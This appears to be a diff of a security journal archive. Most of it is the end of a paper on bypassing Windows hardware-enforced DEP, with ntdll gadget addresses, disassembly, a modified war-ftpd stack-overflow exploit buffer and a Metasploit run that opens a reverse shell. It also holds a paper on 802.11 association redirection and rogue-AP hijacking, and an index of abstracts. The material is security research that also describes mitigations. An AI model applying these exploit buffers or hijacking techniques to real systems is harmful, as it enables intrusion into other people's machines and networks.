more restricted due to the need to use bytes (such as NULL bytes) that would
|
||||
otherwise be unusable in common situations[1].
|
||||
|
||||
DEP itself is capable of functioning in two modes. The first mode is referred
|
||||
to as Software-enforced DEP. It provides fairly limited support for preventing
|
||||
the execution of code through exploits that take advantage of Structured
|
||||
Exception Handler (SEH) overwrites. Software-enforced DEP is used on
|
||||
machines that are not capable of supporting true non-executable pages due to
|
||||
inadequate hardware support. Software-enforced DEP is also a compile-time only
|
||||
change, and as such is typically limited to system libraries and select
|
||||
third-party applications that have been recompiled to take advantage of it.
|
||||
Bypassing this mode of DEP has been discussed before and is not the focus of
|
||||
this document.
|
||||
|
||||
The second mode in which DEP can operate is referred to as Hardware-enforced
|
||||
DEP. This mode is a superset of software-enforced DEP and is used on hardware
|
||||
that supports marking pages as non-executable. While most existing intel-based
|
||||
hardware does not have this feature (due to legacy support for only marking
|
||||
pages as readable or writable), newer chipsets are beginning to have true
|
||||
hardware support through things like Page Address Extensions (PAE).
|
||||
Hardware-enforced DEP is the most interesting of the two modes since it can be
|
||||
seen as a truly mitigating factor to most common exploitation vectors. The
|
||||
bypass technique described in this document is designed to be used against
|
||||
this mode.
|
||||
|
||||
Before describing the technique, it is prudent to understand the parameters
|
||||
under which it will operate. In this case, the technique is meant to provide a
|
||||
way of executing code from regions of memory that would not typically be
|
||||
executable when hardware-enforced DEP is in use, such as a thread stack or a
|
||||
process heap. This technique can be seen as a means of eliminating DEP from the
|
||||
equation when it comes to writing exploits because the commonly used approach of
|
||||
executing custom code from a writable memory address can still be used.
|
||||
Furthermore, this technique is meant to be as generic as possible such that it
|
||||
can be used in both existing and new exploits without major modifications. With
|
||||
the parameters set, the next requirement is to understand some of the new
|
||||
features that compose hardware-enforced DEP.
|
||||
|
||||
When implementing support for DEP, Microsoft rightly realized that many existing
|
||||
third-party applications might run into major compatibility issues due to
|
||||
assumptions about whether or not a region of allocated memory is executable. In
|
||||
order to handle this situation, Microsoft designed DEP so that it could be
|
||||
configured in a few different manners. At the most general level, DEP is
|
||||
designed to have a default parameter that indicates whether or not
|
||||
non-executable protection is enabled only for system processes and custom
|
||||
defined applications (OptIn), or whether it's enabled for everything except for
|
||||
applications that are specifically exempted (OptOut). These two flags are
|
||||
passed to the kernel during boot through the /NoExecute option in boot.ini.
|
||||
Furthermore, two other flags can be passed as part of the NoExecute option to
|
||||
indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a
|
||||
flag to be set for each process that permanently enables or disables DEP. The
|
||||
default setting on Windows XP SP2 is OptIn, while the default setting on Windows
|
||||
2003 Server SP1 is OptOut.
|
||||
|
||||
Aside from the global system parameter, DEP can also be enabled or disabled on a
|
||||
per-process basis. The disabling of non-executable (NX) support for a process
|
||||
is determined at execution time. To support this, a new internal routine was
|
||||
added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few
|
||||
different things to determine whether or not NX support should be enabled for
|
||||
the process. The routine itself is called whenever a DLL is loaded in the
|
||||
context of a process through LdrpRunInitializationRoutines. The first check it
|
||||
performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is
|
||||
flagged as needing to be disabled for the process. The second check it performs
|
||||
is to look in the application database for the process to see if NX support
|
||||
should be disabled or enabled. Lastly, it checks to see if the DLL that is
|
||||
being loaded is flagged as having an NX incompatible section (such as .aspack,
|
||||
.pcle, and .sforce).
|
||||
|
||||
As a result of these checks, NX support is either enabled or disabled through a
|
||||
new PROCESSINFOCLASS named ProcessExecuteFlags (0x22). When a call to
|
||||
NtSetInformationProcess is issued with this information class, a four byte
|
||||
bitmask is supplied as the buffer parameter. This bitmask is passed to
|
||||
nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a
|
||||
flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the
|
||||
bitmask that indicates that future calls to the function should fail such that
|
||||
the execute flags cannot be changed again. To enable NX support, the
|
||||
MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the
|
||||
MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of
|
||||
these per-process flags, execution of code from non-executable memory regions
|
||||
will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied
|
||||
(MEM_EXECUTE_OPTION_DISABLE).
|
||||
|
||||
If it were in some way possible for an attacker to change the execution flags of
|
||||
a process that is being exploited, then it follows that the attacker would be
|
||||
able to execute code from previously non-executable memory regions. In order to
|
||||
do this, though, the attacker would have to run code from regions of memory that
|
||||
are already executable. As chance would have it, there happen to be useful
|
||||
executable memory regions, and they exist at the same address in every process
|
||||
[2].
|
||||
|
||||
To take advantage of this feature, an attacker must somehow cause
|
||||
NtSetInformationProcess to be called with the ProcessExecuteFlags information
|
||||
class. Furthermore, the ProcessInformation parameter must be set to a bitmask
|
||||
that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the
|
||||
MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to
|
||||
this function that would disable NX support for the calling process:
|
||||
|
||||
|
||||
ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;
|
||||
|
||||
NtSetInformationProcess(
|
||||
NtCurrentProcess(), // (HANDLE)-1
|
||||
ProcessExecuteFlags, // 0x22
|
||||
&ExecuteFlags, // ptr to 0x2
|
||||
sizeof(ExecuteFlags)); // 0x4
|
||||
|
||||
|
||||
One method of accomplishing this would be to use a ret2libc derived attack
|
||||
whereby control flow is transferred into the NtSetInformationProcess function
|
||||
with an attacker-controlled frame set up on the stack. In this case, the
|
||||
arguments described to the right in the above code snippet would have to be set
|
||||
up on the stack so that they would be interpreted correctly when
|
||||
NtSetInformationProcess begins executing. The biggest drawback to this approach
|
||||
is that it would require NULL bytes to be usable as part of the buffer that is
|
||||
used for the overflow. Generally speaking, this will not be possible,
|
||||
especially with any overflow that is caused through the use of a string
|
||||
function. However, when possible, this approach can certainly be useful.
|
||||
|
||||
Though a direct return into NtSetInformationProcess may not be universally
|
||||
feasible, another technique can be used that lends itself to being more
|
||||
generally applicable. Under this approach, the attacker can take advantage of
|
||||
code that already exists within ntdll for disabling NX support for a process.
|
||||
By returning into a specific chunk of code, it is possible to disable NX support
|
||||
just as ntdll would while still being able to transfer control back into a
|
||||
user-controlled buffer. The one limitation, however, is that the attacker be
|
||||
able to control the stack in a way similar to most ret2libc style attacks, but
|
||||
without the need to control arguments.
|
||||
|
||||
The first step in this process is to cause control to be transferred to a
|
||||
location in memory that performs an operation that is equivalent to a mov al,
|
||||
0x1 / ret combination. Many instances of similar instructions exist (xor eax,
|
||||
eax/inc eax/ret; mov eax, 1/ret; etc). One such instance can be found in the
|
||||
ntdll!NtdllOkayToLockRoutine function.
|
||||
|
||||
|
||||
ntdll!NtdllOkayToLockRoutine:
|
||||
7c952080 b001 mov al,0x1
|
||||
7c952082 c20400 ret 0x4
|
||||
|
||||
|
||||
This will cause the low byte of eax to be set to one for reasons that will
|
||||
become apparent in the next step. Once control is transferred to the mov
|
||||
instruction, and then subsequently the ret instruction, the attacker must have
|
||||
set up the stack in such a way that the ret instruction actually returns into
|
||||
another segment of code inside ntdll. Specifically, it should return part of
|
||||
the way into the ntdll!LdrpCheckNXCompatibility routine.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x13:
|
||||
7c91d3f8 3c01 cmp al,0x1
|
||||
7c91d3fa 6a02 push 0x2
|
||||
7c91d3fc 5e pop esi
|
||||
7c91d3fd 0f84b72a0200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba)
|
||||
|
||||
|
||||
In this block, a check is made to see if the low byte of eax is set to one.
|
||||
Regardless of whether or not it is, esi is initialized to hold the value 2.
|
||||
After that, a check is made to see if the zero flag is set (as would be the case
|
||||
if the low byte of eax is 1). Since this code will be executed after the first
|
||||
mov al, 0x1 / ret set of instructions, the ZF flag will always be set, thus
|
||||
transferring control to 0x7c93feba.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x1a:
|
||||
7c93feba 8975fc mov [ebp-0x4],esi
|
||||
7c93febd e941d5fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403)
|
||||
|
||||
|
||||
This block sets a local variable to the contents of esi, which in this case is
|
||||
2. Afterwards, it transfers to control to 0x7c91d403.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x1d:
|
||||
7c91d403 837dfc00 cmp dword ptr [ebp-0x4],0x0
|
||||
7c91d407 0f8560890100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d)
|
||||
|
||||
|
||||
This block, in turn, compares the local variable that was just initialized to 2
|
||||
with 0. If it's not zero (which it won't be), control is transferred to
|
||||
0x7c935d6d.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x4d:
|
||||
7c935d6d 6a04 push 0x4
|
||||
7c935d6f 8d45fc lea eax,[ebp-0x4]
|
||||
7c935d72 50 push eax
|
||||
7c935d73 6a22 push 0x22
|
||||
7c935d75 6aff push 0xff
|
||||
7c935d77 e8b188fdff call ntdll!ZwSetInformationProcess (7c90e62d)
|
||||
7c935d7c e9c076feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441)
|
||||
|
||||
|
||||
It's at this point that things begin to get interesting. In this block, a call
|
||||
is issued to NtSetInformationProcess with the ProcessExecuteFlags information
|
||||
class. The ProcessInformation parameter pointer is passed which was previously
|
||||
initialized to 2 [3]. This results in NX support being disabled for the process.
|
||||
After the call completes, it transfers control to 0x7c91d441.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x5c:
|
||||
7c91d441 5e pop esi
|
||||
7c91d442 c9 leave
|
||||
7c91d443 c20400 ret 0x4
|
||||
|
||||
|
||||
Finally, this block simply restores saved registers, issues a leave instruction,
|
||||
and returns to the caller. In this case, the attacker will have set up the
|
||||
frame in such a way that the ret instruction actually returns into a general
|
||||
purpose instruction that transfers control into a controllable buffer that
|
||||
contains the arbitrary code to be executed now that NX support has been
|
||||
disabled.
|
||||
|
||||
This approach requires the knowledge of three addresses. First, the address of
|
||||
the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many
|
||||
occurrences of this type of block, though they may not be as simplistic as the
|
||||
one described in this document. Second, the address of the start of the cmp al,
|
||||
0x1 block inside ntdll!LdrpCheckNXCompatibility must be known. By depending on
|
||||
two addresses within ntdll, it stands to reason that an exploit can be more
|
||||
portable than if one were to depend on addresses from two different DLLs.
|
||||
Finally, the third address is the one that would be the one that is typically
|
||||
used on targets that didn't have hardware-enforced DEP, such as a jmp esp or
|
||||
equivalent instruction depending on the vulnerability in question.
|
||||
|
||||
Aside from specific address limitations, this approach also relies on the fact
|
||||
that ebp is pointed to a valid, writable address such that the value that
|
||||
indicates that NX support should be disabled can be temporarily stored. This
|
||||
can be accomplished a few different ways, depending on the vulnerability, so it
|
||||
is not seen as a largely limiting factor.
|
||||
|
||||
To test this approach, the authors modified the warftpd_165_user exploit from
|
||||
the Metasploit Framework that was written by Fairuzan Roslan. This
|
||||
vulnerability is a simple stack overflow. Prior to our modifications, the
|
||||
exploit was implemented in the following manner:
|
||||
|
||||
|
||||
my $evil = $self->MakeNops(1024);
|
||||
substr($evil, 485, 4, pack("V", $target->[1]));
|
||||
substr($evil, 600, length($shellcode), $shellcode);
|
||||
|
||||
|
||||
This code built a NOP sled of 1024 bytes. At byte index 485, the return address
|
||||
was stored after which point the shellcode was appended [4]. When run against a target
|
||||
that supports hardware-enforced DEP, the exploit fails when it tries to execute
|
||||
the first instruction of the NOP sled because the region of memory (the thread
|
||||
stack) is marked as non-executable.
|
||||
|
||||
Applying the technique described above, the authors changed the exploit to send
|
||||
a buffer structured as follows:
|
||||
|
||||
|
||||
my $evil = "\xcc" x 485;
|
||||
$evil .= "\x80\x20\x95\x7c";
|
||||
$evil .= "\xff\xff\xff\xff";
|
||||
$evil .= "\xf8\xd3\x91\x7c";
|
||||
$evil .= "\xff\xff\xff\xff";
|
||||
$evil .= "\xcc" x 0x54;
|
||||
$evil .= pack("V", $target->[1]);
|
||||
$evil .= $shellcode;
|
||||
$evil .= "\xcc" x (1024 - length($evil));
|
||||
|
||||
|
||||
In this case, a buffer was built that contained 485 int3 instructions. From
|
||||
there, the buffer was set to overwrite the return address with a pointer to
|
||||
ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four
|
||||
bytes are padding as a fake argument that is popped off the stack. Once
|
||||
NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil
|
||||
buffer that is being built (immediately after the 0x7c952080 return address
|
||||
overwrite and the fake argument). This means that NtdllOkayToLockRoutine would
|
||||
return into 0x7c91d3f8. This block of code is what evaluates the low byte of
|
||||
eax and eventually leads to the disabling of NX support for the process. Once
|
||||
completed, the block pops saved registers off the stack and issues a leave
|
||||
instruction, moving the stack pointer to where ebp currently points. In this
|
||||
case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding.
|
||||
Once the block does this, the stack pointer will point 577 bytes into the evil
|
||||
buffer (immediately after the 0x54 bytes of padding). This means that it will
|
||||
return into whatever address is stored at this location. In this case, the
|
||||
buffer is populated such that it simply returns into the target-specified return
|
||||
address (which is a jmp esp equivalent instruction). From there, the jmp esp
|
||||
instruction is executed which transfers control into the shellcode that
|
||||
immediately follows it. Once executed, the exploit works as if nothing had
|
||||
changed:
|
||||
|
||||
$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \
|
||||
LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E
|
||||
[*] Starting Reverse Handler.
|
||||
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
|
||||
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
|
||||
[*] Sending evil buffer....
|
||||
[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638
|
||||
|
||||
Microsoft Windows XP [Version 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\Program Files\War-ftpd>
|
||||
|
||||
|
||||
As can be seen, the technique described in this document outlines a feasible
|
||||
method that can be used to circumvent the security enhancements provided by
|
||||
hardware-enforced DEP in the default installations of Windows XP Service Pack 2
|
||||
and Windows 2003 Server Service Pack 1. The flaw itself is not related to any
|
||||
specific inefficiency or mistake made during the actual implementation of
|
||||
hardware-enforced DEP support, but instead is a side effect of a design decision
|
||||
by Microsoft to provide a mechanism for disabling NX support for a process from
|
||||
within a user-mode process. Had it been the case that there was no mechanism by
|
||||
which NX support could be disabled at runtime from within a process, the
|
||||
approaches outlined in this document would not be feasible.
|
||||
|
||||
In the interest of not presenting a problem without also describing a solution,
|
||||
the authors have identified a few different ways in which Microsoft might be
|
||||
able to solve this. To prevent this approach, it is first necessary to identify
|
||||
the things that it depends on. First and foremost, the technique depends on
|
||||
knowing the location of three separate addresses. Second, it depends on the
|
||||
feature being exposed that allows a user-mode process to disable NX support for
|
||||
itself. Finally, it depends on the ability to control the stack in a manner
|
||||
that allows it perform a ret2libc style attack [5].
|
||||
|
||||
The first dependency could be broken by instituting some form of Address Space
|
||||
Layout Randomization that would thereby make the location of the dependent code
|
||||
blocks unknown to an attacker. The second dependency could be broken by moving
|
||||
the logic that controls the enabling and disabling of a process' NX support to
|
||||
kernel-mode such that it cannot be influenced in such a direct manner. This
|
||||
approach is slightly challenging considering the model that it is currently
|
||||
implemented under requires the ability to disable NX support when certain events
|
||||
(such as the loading of an incompatible DLL) occur. Although it may be more
|
||||
challenging, the authors see this as being the most feasible approach in terms
|
||||
of compatibility. Lastly, the final dependency is not really something that
|
||||
Microsoft can control. Aside from these potential solutions, it might also be
|
||||
possible to come up with a way to make it so the permanent flag is set sooner in
|
||||
the process' initialization, though the authors are not sure of a way in which
|
||||
this could be made possible without breaking support for disabling when certain
|
||||
DLLs are loaded.
|
||||
|
||||
In closing, the authors would like to make a special point to indicate that
|
||||
Microsoft has done an excellent job in raising the bar with their security
|
||||
improvements in XP Serivce Pack 2. The technique outlined in this document
|
||||
should not be seen as a case of Microsoft failing to implement something
|
||||
securely, as the provisions are certainly there to deploy hardware-enforced DEP
|
||||
in a secure fashion, but instead might be better viewed as a concession that was
|
||||
made to ensure that application compatibility was retained for the general case.
|
||||
There is almost always a trade-off when it comes to providing new security
|
||||
features in the face of potential compatibility problems, and it can be said
|
||||
that perhaps no company other than Microsoft is more well known for retaining
|
||||
backward compatibility.
|
||||
|
||||
|
||||
Footnotes
|
||||
|
||||
[1] There are other documented techniques for bypassing non-executable
|
||||
protections, such as returning into ZwProtectVirtualMemory or doing a chained
|
||||
ret2libc style attack, but these approaches tend to be more complicated and in
|
||||
many cases are more restricted due to the need to use bytes (such as NULL
|
||||
bytes) that would otherwise be unusable in common situations.
|
||||
|
||||
[2] With a few parameters that will be discussed later.
|
||||
|
||||
[3] The reason this has to point to 2 and not some integer that has just the low
|
||||
byte set to 2 is because nt!MmSetExecutionOptions has a check to ensure that the
|
||||
unused bits are not set.
|
||||
|
||||
[4] In reality, it may not be the return address that is being overwritten, but
|
||||
instead might be a function pointer. The fact that it is at a misaligned
|
||||
address lends credence to this fact, though it is certainly not a clear
|
||||
indication.
|
||||
|
||||
[5] This is possible even when an SEH overwrite is leveraged, given the right
|
||||
conditions. The basic approach is to locate a pop reg, pop reg, pop esp, ret
|
||||
instruction set in a region that is not protected by SafeSEH (such as a
|
||||
third-party DLL that was not compiled with /GS). The pop esp shifts the stack
|
||||
to the start of the EstablisherFrame that is controlled by the attacker and the
|
||||
ret returns into the address stored within the overwritten Next pointer. If one
|
||||
were to set the Next pointer to the location of the NtdllOkayToLockRoutine and
|
||||
the stack were set up as explained above, the technique used to bypass
|
||||
hardware-enforced DEP that is described in this document could be made to work.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
The Metasploit Project. War-ftpd 1.65 USER Overflow.
|
||||
http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user;
|
||||
accessed Oct 2, 2005.
|
||||
|
||||
Microsoft Corporation. Data Execution Prevention.
|
||||
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx;
|
||||
accessed Oct 2, 2005.
|
235
uninformed/2.4.txt
Normal file
235
uninformed/2.4.txt
Normal file
|
@ -0,0 +1,235 @@
|
|||
802.11 VLANs
|
||||
Johnny Cache
|
||||
johnycsh@gmail.com
|
||||
Last modified: 09/07/05
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: The goal of this paper is to introduce the reader to association
|
||||
redirection and how it could to used to implement something analogous to VLANs
|
||||
found in wired media into a typical IEEE 802.11 environment. What makes this
|
||||
technique interesting is that it can be accomplished without breaking the IEEE
|
||||
802.11 standard on the client side, and requires only minor changes made to the
|
||||
Access Point (AP). No modifications are made to the 802.11 MAC. It is the
|
||||
author's hope that after reading this paper the reader will not only
|
||||
understand the specific technique outlined below, but will consider protocol
|
||||
quirks with a new perspective in the future.
|
||||
|
||||
|
||||
2) Background
|
||||
|
||||
The IEEE 802.11 specification defines a hierarchy of three states a client can
|
||||
be in. When a client wishes to connect to an Access Point (AP) he progresses
|
||||
from state 1 to 2 to 3. The client progresses initially from state 1 to state 2
|
||||
by successfully authenticating (this authentication stage happens even when
|
||||
there is no security enabled). Similarly the client progresses from state 2 to
|
||||
3 by associating. Once a client as associated he enters state 3 and can
|
||||
transmit data using the AP.
|
||||
|
||||
|
||||
Unlike ethernet, 802.3, or other link layer headers, 802.11 headers contain at
|
||||
least 3 addresses: source, destination, and Basic Service Set ID (BSSID). The
|
||||
BSSID can be best thought of as a through field. Packets destined for the APs
|
||||
interface have both destination and BSSID set to the same value. A packet
|
||||
destined to a different host on the same WLAN however would have the BSSID set
|
||||
to the AP and the destination set to the host.
|
||||
|
||||
|
||||
The state transition diagram in the standard dictates that if a client receives
|
||||
an association response with a different BSSID than the BSSID that it was
|
||||
associating with, then the client should associate to the new BSSID. The
|
||||
technique of sending an association response with a different BSSID in the
|
||||
header is known as association redirection. While the motivation for this
|
||||
idiosyncrasy is unclear, it can be leveraged to dynamically create what has
|
||||
been described as a personal virtual bridged LAN (PVLAN).
|
||||
|
||||
|
||||
3) Introduction
|
||||
|
||||
The most compelling reason to virtualize APs has been security. There are
|
||||
currently two possible techniques for doing this, though only one has been
|
||||
deployed in the wild. The most prevalent has been implemented by Colubris in
|
||||
their virtual access point technology.
|
||||
|
||||
|
||||
The other technique, public access point (PAP) and personal virtual bridged
|
||||
LANs (PVLANs), which is described in this paper, has been documented in U.S.
|
||||
patent no. 20040141617.
|
||||
|
||||
|
||||
3.1) The state of the art
|
||||
|
||||
The Colubris virtual access point technology is a single physical device that
|
||||
implements an entirely independent 802.11 MAC protocol layer (including a
|
||||
unique BSSID) for each virtual AP. The only thing shared between the individual
|
||||
virtual APs is the hardware they are running on. The device goes so far as to
|
||||
implement virtual Management Information Bases (MIBs) for each virtual AP. The
|
||||
Colubris solution fits well into a heavily managed static environment where the
|
||||
users and the groups they belong to are well defined. Deploying it requires
|
||||
that each user knows which SSID to associate with a priori, along with any
|
||||
required authentication credentials. The virtual access point is capable of
|
||||
mapping virtual access points into 802.1q VLANs.
|
||||
|
||||
|
||||
The public AP solution fits well into less managed networks. Public AP
|
||||
utilizes the technique outlined in this paper. The Public AP broadcasts a
|
||||
single beacon for a Public Access Point (PAP). When a client attempts to
|
||||
associate, the PAP redirects him to a dynamically generated VBSSID, placing him
|
||||
on his own PVLAN. This is well suited to a typical hotspot scenario where there
|
||||
is no implicit trust between users, and the number of clients is not known
|
||||
beforehand. This technique could also be used in conjunction with traditional
|
||||
802.1q VLANs, however its strength lies in the lower burden of administrative
|
||||
requirements. This technique is designed to work well when deployed in the
|
||||
common hot spot scenario where the administrators have little other network
|
||||
infrastructure and the only thing upstream is a best effort common carrier
|
||||
provider.
|
||||
|
||||
|
||||
4) PVLANs and virtual BSSIDs
|
||||
|
||||
PVLANs are called Personal Bridged VLANs because the VLAN is created
|
||||
dynamically for the client. The client essentially owns the VLAN since he
|
||||
controls its creation and its lifetime. In the most common scenario there
|
||||
would only be a single client per PVLAN.
|
||||
|
||||
|
||||
An access point that implements the PAP concept intentionally re-directs
|
||||
associating clients to their own dynamically generated BSSID (Virtual BSSID or
|
||||
VBSSID).
|
||||
|
||||
|
||||
In the example below the AP is broadcasting a public BSSID of 00:11:22:33:44:55
|
||||
and is redirecting the client to his own VBSSID 00:22:22:22:22:22.
|
||||
|
||||
|
||||
5) The Experiment
|
||||
|
||||
The experiment conducted was not a full-blown implementation of a PAP. The
|
||||
experiment was designed to test a wide variety of chipsets, cards, and drivers
|
||||
for compatibility with the standard and susceptibility to association
|
||||
re-direction. To this end all the cards were subjected to every reasonable
|
||||
intrepretation of the standard.
|
||||
|
||||
|
||||
The experiment was conducted by making some simple changes to the host-ap
|
||||
driver on Linux. Host-ap can operate in Access Point mode as well as in client
|
||||
mode. All the modifications were made in Access Point mode. Host-ap's
|
||||
client-side performance is unrelated to the changes made for the experiment.
|
||||
|
||||
|
||||
The experiment was conducted in two phases. First, host-ap was modified to
|
||||
mangle all management frames by modifying the source, BSSID, source and BSSID
|
||||
(at the same time). The results of this are reflected in table one.
|
||||
|
||||
After this was complete, host-ap was modified to return authentication replies
|
||||
un-mangled. This was due to the amount of cards that simply ignored mangled
|
||||
authentication replys. These results are cataloged in table two.
|
||||
|
||||
|
||||
5.1) The Results
|
||||
|
||||
The responses in table one varied all the way from never leaving stage 1 to
|
||||
successful redirection. The most interesting cases are the drivers that
|
||||
successfully made it to stage 3. There are three cases of this. The cases
|
||||
marked ORIGINALBSSID are what was initially expected from many devices, that
|
||||
they would simply ignore the redirect request and continue to transmit on the
|
||||
PAP BSSID. The REDIRECTREASSOC case is a successful redirection with a small
|
||||
twist. The card transmits all data to VBSSID, however it periodically sends
|
||||
out reassociation requests to the PAP BSSID.
|
||||
|
||||
The SCHIZO case is the other case that made it into stage 3. In this case the
|
||||
card is listening on the PAP BSSID and then proceeds to transmit on the VBSSID.
|
||||
The device seems to ignore any data transmitted to it on the VBSSID.
|
||||
|
||||
|
||||
As mentioned previously in table two, the possibilty of ignoring authentication
|
||||
reply's has been eliminated by not mangling fields until the association
|
||||
request. This opened up the possibilty for some interesting responses.
|
||||
|
||||
The Apple airport extreme card responded with a flood of deauthentication
|
||||
packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The
|
||||
Atheros card is the only other card that sent a deauth, though it had a much
|
||||
more measured response, sending a single de-auth to the original BSSID
|
||||
(SIMPLEDEAUTHSTA).
|
||||
|
||||
The other new response in table 2 is the DUALBSSID behavior. These cards seem
|
||||
to alternate intentionally between both BSSIDS on every other transmitted
|
||||
packet. It is unknown whether they continue to do this for the entire
|
||||
connection or if this is some sort of intentional behavior and they will choose
|
||||
whichever BSSID they receive data on first.
|
||||
|
||||
The experiment provided some very surprising results. Originaly it was
|
||||
suspected that many cards would simply never enter stage 3, or alternately just
|
||||
use the original BSSID they set out to. Quite a few cards can be convinced to
|
||||
go into dual BSSID behavior and might be susceptible to association
|
||||
redirection. Two drivers for the hermes chipset were successfuly redirected.
|
||||
|
||||
|
||||
6) Future Work
|
||||
|
||||
Clearly modifying client side drivers for better standards compliance is one
|
||||
area work could be done. More interesting questions are how does one handle key
|
||||
management on the AP in this situation? Clearly any PSK solutions don't really
|
||||
apply in this scenario. How much deviation from the spec needs to happen for
|
||||
WPA 802.1x authentication to successfully be deployed? One interesting area of
|
||||
research is the concept of a stealthy rogue AP.
|
||||
|
||||
|
||||
By using association redirection clients could be the victim of stealthy (from
|
||||
the perspective of the network admin) association hijacking from a rogue AP. An
|
||||
adversary could just set up shop with a modified host-ap driver on a Linux box
|
||||
that didn't transmit beacons. Rather it would wait for a client to attempt an
|
||||
association request with the legitimate access point and try to win a race
|
||||
condition to see who could send an association reply first. Alternately the
|
||||
adversary could simply de-authenticate the user and then be poised to win the
|
||||
race.
|
||||
|
||||
|
||||
Another interesting question is the whether or not a PAP could withstand a DOS
|
||||
attack attempting to create an overwhelming amount of VBSSIDs. It is the
|
||||
authors opinion that a suitable algorithm could be found to make the resources
|
||||
required for the attack too costly for most. By dynamically expiring PVLANs and
|
||||
VBSSIDs as a function of time and traffic the PAP could burden the attacker
|
||||
with keeping track of all his VBSSIDs as well, instead of just creating as many
|
||||
as he can and forgetting about them.
|
||||
|
||||
|
||||
7) Conclusion
|
||||
|
||||
It is unlikely that this technique could be successfully be deployed to create
|
||||
PVLAN's in a general scenario due to varied behavior from the vendors.
|
||||
However, it does appear that a determined attacker could encode the data
|
||||
generated from this experiment into a modified host-ap driver so that he could
|
||||
stealthily redirect traffic to himself. This would give the attacker a slight
|
||||
advantage over typical ARP poisioning attacks since he doesn't need to generate
|
||||
any suspicous ARP activity. It also has an advantage over simple rogue access
|
||||
points, as it requires no beacons which can easily be detected.
|
||||
|
||||
|
||||
8) Bibliography
|
||||
|
||||
Volpano, Dennis. United States Patent Application 200403141617 July 22, 2003
|
||||
http://appft1.uspto.gov/netahtml/PTO/search-adv.html
|
||||
|
||||
Institute of Electrical and Electronics Engineers.
|
||||
|
||||
Information technology - Telecommunications and information
|
||||
exchange between systems - Local and metropolitan area networks - Specific
|
||||
Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical
|
||||
Layer (PHY) Specifications, IEEE Std. 802.11-1999, 1999. (pg 376)
|
||||
1999
|
||||
|
||||
|
||||
Aboba, Bernard.
|
||||
Virtual Access Points (IEEE document IEEE 802.11-03/154r1) May 22, 2003
|
||||
http://www.drizzle.com/ aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc
|
||||
|
||||
|
||||
Colubris Networks. Virtual Access Point Technology Multiple WLAN Services
|
||||
http://www.colubris.com/literature/whitepapers.asp
|
||||
accessed Aug 09, 2005.
|
||||
|
||||
|
||||
|
||||
|
||||
|
25
uninformed/2.txt
Normal file
25
uninformed/2.txt
Normal file
|
@ -0,0 +1,25 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Inside Blizzard: Battle.net
|
||||
Skywing
|
||||
This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
Temporal Return Addresses
|
||||
skape
|
||||
Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable.
|
||||
html | pdf | txt | code.tgz
|
||||
|
||||
Bypassing Windows Hardware-enforced DEP
|
||||
skape & Skywing
|
||||
This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits.
|
||||
html | pdf | txt
|
||||
|
||||
General Research
|
||||
